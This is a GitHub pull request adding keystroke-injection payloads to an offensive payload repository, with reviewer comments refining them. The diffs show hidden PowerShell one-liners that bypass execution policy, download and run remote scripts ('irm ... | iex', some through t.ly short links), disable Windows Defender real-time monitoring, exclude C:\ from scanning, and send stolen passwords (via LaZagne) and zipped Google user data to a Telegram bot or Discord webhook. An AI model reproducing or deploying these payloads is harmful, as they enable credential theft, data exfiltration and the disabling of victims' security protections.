-
Notifications
You must be signed in to change notification settings - Fork 1.3k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
1 New Mobile IOS payload | 2 New Exfiltration payloads #410
base: master
Are you sure you want to change the base?
Conversation
Mr-Proxy-source
commented
Dec 16, 2023
•
edited
edited
- Added payload for opening links for IOS 17 and older
- Added Lazagne exfil payload for exfiltrating all passwords through telegram bot
- Added Google exfil payload that uses 7zip to zip user data, upload it to file-sharing service and send download link through telegram bot or discord webhook.
- Fixed some mistakes in Copy and Waste
Line 10 added r after GUI, line 11 added delay.
This payload runs powershell script that zip google user data, uses gofile.io api to upload it, and then sends download link to telegram bot or discord webhook.
DELAY 500 | ||
REM If you want to use Telegram change just bot token and chat id | ||
REM If you want to use Discord Webhook dont do anything with botToken and chatID just change $webhook | ||
STRING powershell -w h -NoP -Ep Bypass -Command $botToken='bot_token'; $chatID='chat_id'; $webhook='dc_webhook'; irm https://t.ly/pPFpN | iex |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
DELAY 1500 | ||
GUI r | ||
DELAY 500 | ||
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='bot-token'; $ci='chat-id'; irm https://t.ly/-qlYd | iex'" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
DELAY 1000 | ||
GUI SPACE | ||
DELAY 250 | ||
REM Put your link down there ↓ |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I added defining for url
All requested changes have been made, if there is anything else let me know. |
Changed to example.com
Changed to example.com
DELAY 500 | ||
REM If you want to use Telegram change just bot token and chat id | ||
REM If you want to use Discord Webhook dont do anything with botToken and chatID just change $webhook | ||
STRING powershell -w h -NoP -Ep Bypass -Command $botToken='BOT_TOKEN'; $chatID='CHAT_ID'; $webhook='DC_WEBHOOK'; irm SCRIPT_URL | iex |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
the only DEFINE
being called is for SCRIPT_URL
. You need to add #
to your defines. for example:
DEFINE #BOT_TOKEN your-bot-token
DEFINE #SCRIPT_URL example.com/payload.ps1?dl=1
DEFINE #DC_WEBHOOK your-webhook
DEFINE #CHAT_ID your-chat-id
STRING powershell -w h -NoP -Ep Bypass -Command $botToken='#BOT_TOKEN'; $chatID='#CHAT_ID'; $webhook='#DC_WEBHOOK'; irm #SCRIPT_URL | iex
its not required you do it with SCRIPT_URL
its still highly recommended.
DELAY 1500 | ||
GUI r | ||
DELAY 500 | ||
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='BOT_TOKEN'; $ci='CHAT_ID'; irm SCRIPT_URL | iex'" |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
the only DEFINE
being called is for SCRIPT_URL
. You need to add #
to your defines. for example:
DEFINE #BOT_TOKEN your-bot-token
DEFINE #CHAT_ID your-chat-id
DEFINE #SCRIPT_URL example.com/payload.ps1?dl=1
STRING powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Add-MpPreference -ExclusionPath 'C:\'; Start-Sleep -Seconds 5; powershell -w h -NoP -Ep Bypass -Command '$bt='#BOT_TOKEN'; $ci='#CHAT_ID'; irm #SCRIPT_URL | iex'"
its not required you do it with SCRIPT_URL
its still highly recommended.